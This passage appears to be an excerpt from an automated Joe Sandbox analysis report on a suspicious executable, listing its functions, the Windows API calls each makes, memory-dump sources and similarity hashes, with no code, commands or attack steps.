                                                                          • Opcode Fuzzy Hash: 6461151ac5600d5ceb7ce49ccd0f3668d6d1df2d92e1d8e4673b7049de0659f8
                                                                          • Instruction Fuzzy Hash: 64E06D32544245EBDB215FA4FC0D7E83F14EB16336F0083A6FA69A80E18BB549D0DB12
                                                                          Function 00B38C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThread.KERNEL32 ref: 00B38C63
                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B3882E), ref: 00B38C6A
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B3882E), ref: 00B38C77
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B3882E), ref: 00B38C7E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                          • String ID:
                                                                          • API String ID: 3974789173-0
                                                                          • Opcode ID: 65e9f77b6a9c837475c206f7388a6f7ee90331d58d0f23ecd5d7cdd13d7d7572
                                                                          • Instruction ID: 41b6713dcfddffc9a6167eb5e948d4a17ba9ad3c924ae016129747b7e868d4ec
                                                                          • Opcode Fuzzy Hash: 65e9f77b6a9c837475c206f7388a6f7ee90331d58d0f23ecd5d7cdd13d7d7572
                                                                          • Instruction Fuzzy Hash: D1E04F36646312ABD7205FB07D0CB663BA8EF50792F244868F245CA080DE7894418B61
                                                                          Function 00B22187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00B22187
                                                                          • GetDC.USER32(00000000), ref: 00B22191
                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B221B1
                                                                          • ReleaseDC.USER32(?), ref: 00B221D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: 64e4e960941807193e2a4d32d4bb2c56de005708e66fcebfa82327f7720efdcd
                                                                          • Instruction ID: b6539ec16c0addbb4f24641ee44c5a45fa22a89c1565e96ccb77cd38874ad740
                                                                          • Opcode Fuzzy Hash: 64e4e960941807193e2a4d32d4bb2c56de005708e66fcebfa82327f7720efdcd
                                                                          • Instruction Fuzzy Hash: A7E0E5B5800215EFDB019F61E808AAD7BF1FF4C351F108425F95AE72A0CBB88142DF40
                                                                          Function 00B2219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00B2219B
                                                                          • GetDC.USER32(00000000), ref: 00B221A5
                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B221B1
                                                                          • ReleaseDC.USER32(?), ref: 00B221D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: f8c7a4aaf6c8d6949149aa8c77ec17225598578ba935ae80973667c85c24399f
                                                                          • Instruction ID: c202ec543e5c8a45960fa228de9be8c94c1115524db7aecdcd6631b303d5c74b
                                                                          • Opcode Fuzzy Hash: f8c7a4aaf6c8d6949149aa8c77ec17225598578ba935ae80973667c85c24399f
                                                                          • Instruction Fuzzy Hash: 98E0E5B5800205AFCB019F61E8086AD7BB1BB4C351F108025F95A972A0CBB89142DF40
                                                                          Function 00B3B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 00B3B981
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ContainedObject
                                                                          • String ID: AutoIt3GUI$Container
                                                                          • API String ID: 3565006973-3941886329
                                                                          • Opcode ID: a4d26f12e671fe9ff8afa8116b2f31cd8bc1d84e64304601b9a3807e0d8db36f
                                                                          • Instruction ID: 0e7a6a1646860f60caead7d8de122ba6a993dfd48ceece76da493eb32b21c17a
                                                                          • Opcode Fuzzy Hash: a4d26f12e671fe9ff8afa8116b2f31cd8bc1d84e64304601b9a3807e0d8db36f
                                                                          • Instruction Fuzzy Hash: 75914C706006019FDB64DF68C884F66BBE9FF48710F2485ADFA49CB695DB70E841CB50
                                                                          Function 00B4B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AFFEC6: _wcscpy.LIBCMT ref: 00AFFEE9
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • __wcsnicmp.LIBCMT ref: 00B4B298
                                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B4B361
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                          • String ID: LPT
                                                                          • API String ID: 3222508074-1350329615
                                                                          • Opcode ID: 0bc9fa6b312ea8421aef66cc1dd1eb656a422401e20f236f793392e5e24f0a21
                                                                          • Instruction ID: bedd92bc4a63c909dbe5f33f5a2317176b076f0c52a01ea8e2cda5db80e5c791
                                                                          • Opcode Fuzzy Hash: 0bc9fa6b312ea8421aef66cc1dd1eb656a422401e20f236f793392e5e24f0a21
                                                                          • Instruction Fuzzy Hash: FA615175A00215AFCB14DF99C985EAEB7F4EF08310F1540AAFA46AB291DB70EE40DB54
                                                                          Function 00AF2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00AF2AC8
                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00AF2AE1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemorySleepStatus
                                                                          • String ID: @
                                                                          • API String ID: 2783356886-2766056989
                                                                          • Opcode ID: 922fdfe5e37ad1e4c08fce7d504b4b2388abc231e82c1eae9a4717f44150d183
                                                                          • Instruction ID: 2082879b3d17b2096268a0232eeb0e053c0b79d56db875d79dfdf97c76c6bcf5
                                                                          • Opcode Fuzzy Hash: 922fdfe5e37ad1e4c08fce7d504b4b2388abc231e82c1eae9a4717f44150d183
                                                                          • Instruction Fuzzy Hash: D25149B14187859BD320AF15DD86BAFBBE8FF84310F82485DF1D9521A1DF308929CB16
                                                                          Function 00B499BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE506B: __fread_nolock.LIBCMT ref: 00AE5089
                                                                          • _wcscmp.LIBCMT ref: 00B49AAE
                                                                          • _wcscmp.LIBCMT ref: 00B49AC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$__fread_nolock
                                                                          • String ID: FILE
                                                                          • API String ID: 4029003684-3121273764
                                                                          • Opcode ID: 256946da5479d424fe5ba4cab19d12b4088f0c62082dd4a10dd6338433069638
                                                                          • Instruction ID: ddbe1e93ec4ecbc76577c4b40e80adbde957c20130feb9638dd54ff39461483b
                                                                          • Opcode Fuzzy Hash: 256946da5479d424fe5ba4cab19d12b4088f0c62082dd4a10dd6338433069638
                                                                          • Instruction Fuzzy Hash: 3D41F471A00609BEDF219EA1DC86FEFBBFDDF45714F0000B9F900A7181DA75AA0497A1
                                                                          Function 00B52882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B52892
                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B528C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CrackInternet_memset
                                                                          • String ID: |
                                                                          • API String ID: 1413715105-2343686810
                                                                          • Opcode ID: 9b4875ba153317725ee296984fe8983d2ac34013e57a0cbc6a206b562c7901ad
                                                                          • Instruction ID: c5f4a409dc829da2c195a203fbf71b3b1b94271aeead000487d0560d3fd6849b
                                                                          • Opcode Fuzzy Hash: 9b4875ba153317725ee296984fe8983d2ac34013e57a0cbc6a206b562c7901ad
                                                                          • Instruction Fuzzy Hash: DA313D71801119AFCF41DFA1DC85EEEBFB9FF19300F1040A9F815A6265DB315A56DBA0
                                                                          Function 00B66CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00B66D86
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B66DC2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$DestroyMove
                                                                          • String ID: static
                                                                          • API String ID: 2139405536-2160076837
                                                                          • Opcode ID: f5727f451895d95f42c2d66bf10e373e125b3bc8331b3b47edf04c856f3b2ce3
                                                                          • Instruction ID: e87b91654631e855bd4825c5aa2c2882d4f7fc3323ba5b9d7472c65446517fab
                                                                          • Opcode Fuzzy Hash: f5727f451895d95f42c2d66bf10e373e125b3bc8331b3b47edf04c856f3b2ce3
                                                                          • Instruction Fuzzy Hash: 26317C71210604AADB109F68DC80AFB77F9FF48760F109629F9A697190DA75AC91CB60
                                                                          Function 00B42D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B42E00
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B42E3B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu_memset
                                                                          • String ID: 0
                                                                          • API String ID: 2223754486-4108050209
                                                                          • Opcode ID: 07387ae8b52a08a72fb380fcc0c1a723d9dd28da20e56fed05fcec26335248fa
                                                                          • Instruction ID: 9fe83fb8fab37f76b50367cafd4915ab7c2299bbbf1a6cfaec8eff86dc1e98b7
                                                                          • Opcode Fuzzy Hash: 07387ae8b52a08a72fb380fcc0c1a723d9dd28da20e56fed05fcec26335248fa
                                                                          • Instruction Fuzzy Hash: EE31C131A40309ABEB248F58D985BAEBBF9EF05350F5404AAF985971A0E7709B44FB50
                                                                          Function 00B66943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B669D0
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B669DB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Combobox
                                                                          • API String ID: 3850602802-2096851135
                                                                          • Opcode ID: 671cb55c6015d38bfeea34e26626b72b1bbbac11228722a125e78fd1f894bd85
                                                                          • Instruction ID: 7f6fc428091b7a5600a94b3a91c83ff440e011d1c99abd2ba8fda6a3755bea01
                                                                          • Opcode Fuzzy Hash: 671cb55c6015d38bfeea34e26626b72b1bbbac11228722a125e78fd1f894bd85
                                                                          • Instruction Fuzzy Hash: F511C4717002097FEF159F64DC80EBB3BAAEB893A4F110264FD58972E0D6799C518BA0
                                                                          Function 00B66E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AE1D73
                                                                            • Part of subcall function 00AE1D35: GetStockObject.GDI32(00000011), ref: 00AE1D87
                                                                            • Part of subcall function 00AE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE1D91
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00B66EE0
                                                                          • GetSysColor.USER32(00000012), ref: 00B66EFA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                          • String ID: static
                                                                          • API String ID: 1983116058-2160076837
                                                                          • Opcode ID: aae94415ea6e66fe12c9fba52bac4f5afefc2ba481ffacbf4ecd74d8161678b6
                                                                          • Instruction ID: aadbabd5d6da0e13758371033dba13cd84f5d9250ba778b6bb728e915130f3a5
                                                                          • Opcode Fuzzy Hash: aae94415ea6e66fe12c9fba52bac4f5afefc2ba481ffacbf4ecd74d8161678b6
                                                                          • Instruction Fuzzy Hash: 7A21597261020AAFDB04DFA8DD45AFA7BF8FB08314F004668FD55D3250D679E861DB50
                                                                          Function 00B66B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00B66C11
                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B66C20
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LengthMessageSendTextWindow
                                                                          • String ID: edit
                                                                          • API String ID: 2978978980-2167791130
                                                                          • Opcode ID: 895a53f7998769b41c45bacbb7c8f32f664b5db78ef162d5a1edbfc8f7a206e2
                                                                          • Instruction ID: 570cf79158325f34edfd7529e8b008eef4851eedf3108bf912e1ca2054c251a8
                                                                          • Opcode Fuzzy Hash: 895a53f7998769b41c45bacbb7c8f32f664b5db78ef162d5a1edbfc8f7a206e2
                                                                          • Instruction Fuzzy Hash: 11116A71505208ABEB108F64DC82ABA37AAEB15368F244764F961D71E0CA79DC919B60
                                                                          Function 00B42E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B42F11
                                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B42F30
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu_memset
                                                                          • String ID: 0
                                                                          • API String ID: 2223754486-4108050209
                                                                          • Opcode ID: 273289b46692830742115d01fed412ec55924967f182d360a0348a47ff59a5fc
                                                                          • Instruction ID: 334fc44396cf795accab6e73ab4fe403e296ff41d6afaab1d27c0a8276e55573
                                                                          • Opcode Fuzzy Hash: 273289b46692830742115d01fed412ec55924967f182d360a0348a47ff59a5fc
                                                                          • Instruction Fuzzy Hash: 1C11B672901124ABDF21DB98DC84BAD77F9EB15310F9800E5F855A72A0DBB0AF08F791
                                                                          Function 00B524CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B52520
                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B52549
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$OpenOption
                                                                          • String ID: <local>
                                                                          • API String ID: 942729171-4266983199
                                                                          • Opcode ID: bbbce9a2b9e3289eee72325cd8b9361daa1bd9d6bc19b3d7c528987c26e54532
                                                                          • Instruction ID: 79b9d5fdcebce600d659c904d664c863e1c1d2c05d40a5fc0914849051f3f3b0
                                                                          • Opcode Fuzzy Hash: bbbce9a2b9e3289eee72325cd8b9361daa1bd9d6bc19b3d7c528987c26e54532
                                                                          • Instruction Fuzzy Hash: 5711E070102225BADB248F519CD9FBBFFE8FB27352F1081EAFE4542140E2706949DAE0
                                                                          Function 00B580A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B5830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00B580C8,?,00000000,?,?), ref: 00B58322
                                                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B580CB
                                                                          • htons.WSOCK32(00000000,?,00000000), ref: 00B58108
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
